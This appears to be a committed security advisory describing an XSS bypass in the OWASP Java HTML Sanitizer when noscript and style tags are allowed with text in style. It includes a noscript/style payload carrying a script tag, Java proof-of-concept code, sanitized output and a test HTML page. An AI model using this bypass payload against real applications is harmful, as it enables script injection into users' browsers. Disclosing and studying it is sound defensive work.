+ "details": "### Summary\nIt is observed that OWASP java html sanitizer is vulnerable to XSS if HtmlPolicyBuilder allows `noscript` and `style` tags with `allowTextIn` inside the style tag. This could lead to XSS if the payload is crafted in such a way that it does not sanitise the CSS and allows tags which is not mentioned in HTML policy. \n\n### Details\n\nThe OWASP java HTML sanitizer is vulnerable to XSS. This only happens when HtmlPolicyBuilder allows `noscript` & `style` tag with `allowTextIn` inside style tags.\n\nThe following condition is very edge case but if users combine a HtmlPolicyBuilder with any other tags except `noscript` and allow `style` tag with `allowTextIn` inside the style tag then In this case sanitizer would be safe from XSS. This happens because how the browser also perceives `noscript` tags post sanitization. \n\n### PoC\n\n1. Lets create a `HtmlPolicyBuilder` which allows `p, noscript, style` html tags and allows `.allowTextIn(\"style\")`.\n2. There are two XSS payloads which very identical and only difference is one has p tag and other has noscript tag.\nThese payload have script tags that could be vulnerable to XSS and should be stripped out after sanitisation.\n\n```HTML\n1. <noscript><style></noscript><script>alert(1)</script>\n2. <p><style></p><script>alert(1)</script>\n```\n\n3. Run the following piece of code which sanitizes the payload. \n\n```java\npublic class main {\n\tprivate static final String ALLOWED_HTML_TAGS = \"p, noscript, style\";\n\n\t/**\n\t * Description of vulnerability :\n\t * The OWASP Sanitizer sanitize the user inputs w.r.t to defined whitelisted HTML tags.\n\t * However, if script tags is not allowed in the HTML element policy yet it can lead to XSS in edge cases.\n\t */\n\n\tpublic static void main(String[] args) {\n\t\twithAllowedTextAndStyleTag();\n\t}\n\n\t/**\n\t * Test case : Vulnerable to XSS\n\t */\n\tpublic static void withAllowedTextAndStyleTag() {\n\t\tHtmlPolicyBuilder htmlPolicyBuilder = new HtmlPolicyBuilder();\n\t\tPolicyFactory policy = htmlPolicyBuilder\n\t\t\t\t.allowElements(ALLOWED_HTML_TAGS.split(\"\\\\s*,\\\\s*\"))\n\t\t\t\t.allowTextIn(\"style\")\n\t\t\t\t.toFactory();\n\t\tString untrustedHTMLOne = \"<noscript><style></noscript><script>alert(1)</script>\";\n\t\tString untrustedHTMLTwo = \"<p><style></p><script>alert(1)</script>\";\n\n\t\tSystem.out.println(\"PAYLOAD: \" + untrustedHTMLOne +\"\\nSANITIZED OUTPUT: \" + policy.sanitize(untrustedHTMLOne));\n\t\tSystem.out.println(\"PAYLOAD: \" + untrustedHTMLTwo +\"\\nSANITIZED OUTPUT: \" + policy.sanitize(untrustedHTMLTwo));\n\t}\n}\n```\n\nUse the latest library version \n\n```xml\n\t\t<dependency>\n\t\t\t<groupId>com.googlecode.owasp-java-html-sanitizer</groupId>\n\t\t\t<artifactId>owasp-java-html-sanitizer</artifactId>\n\t\t\t<version>20240325.1</version>\n\t\t</dependency>\n```\n\n4. Output of the POC code should look like this \n\n```HTML\n\nPAYLOAD: <noscript><style></noscript><script>alert(1)</script>\nSANITIZED OUTPUT: <noscript><style></noscript><script>alert(1)</script></style></noscript>\n\n\nPAYLOAD: <p><style></p><script>alert(1)</script>\nSANITIZED OUTPUT: <p><style></p><script>alert(1)</script></style></p>\n\n```\n\n5. Lets understand what happened in sanitization process below \n\n```txt\n--------------------------| --> anything after style tag is cosidered as CSS and not sanitized \nPAYLOAD: <noscript><style> {</noscript><script>alert(1)</script>} -> CSS\n\n-----------------------------------| --> after sanitization, payload in script tag remained same and style and noscript tags is closed. \nSANITIZED OUTPUT: <noscript><style>{</noscript><script>alert(1)</script>}</style></noscript>\n\n-------------------| --> anything after style tag is cosidered as CSS and not sanitized \nPAYLOAD: <p><style></p>{<script>alert(1)</script>} -> CSS\n\n--------------------------- | --> after sanitization payload in script tag remained same and style and p tags is closed. \nSANITIZED OUTPUT: <p><style>{</p><script>alert(1)</script>}</style></p>\n\n```\n\n6. Lets create a sample html page and copy both sanitized output which should be generated in step 5 \n\n```HTML\n\n<!DOCTYPE html>\n<html lang=\"en\">\n<head>\n <meta charset=\"UTF-8\">\n <title>POC OF SANITIZER OUTPUT</title>\n</head>\n<body>\n\n<!--XSS OUTPUT : <noscript><style></noscript><script>alert(1)</script></style></noscript>-->\n<noscript><style></noscript><script>alert(1)</script></style></noscript>\n\n<!-- SAFE OUTPUT -->\n<p><style></p><script>alert(1)</script></style></p>\n\n</body>\n</html>\n```\n\n\n\n7. Open this HTML page in the browser it should pop an alert.\n\n\n\n8. Open inspect element to understand what happened. If users look closely a payload combined with p tag and style tag did not cause XSS and browser percived anything after style tag as CSS. \n\n\n\n9. The payload which combined with noscript tag and style tag did caused XSS.\nThe broswer perceived noscript and which wrapped `style` tag then closed noscript tag and after that script payload is considered as valid HTML tag and it executed in browser and this leads to XSS because this is very different then what happened in the last example with p tag.\n\n\n\n\n### Impact\n1. This potentially could leads to XSS in applications. \nRef : https://owasp.org/www-community/attacks/xss/",
0 commit comments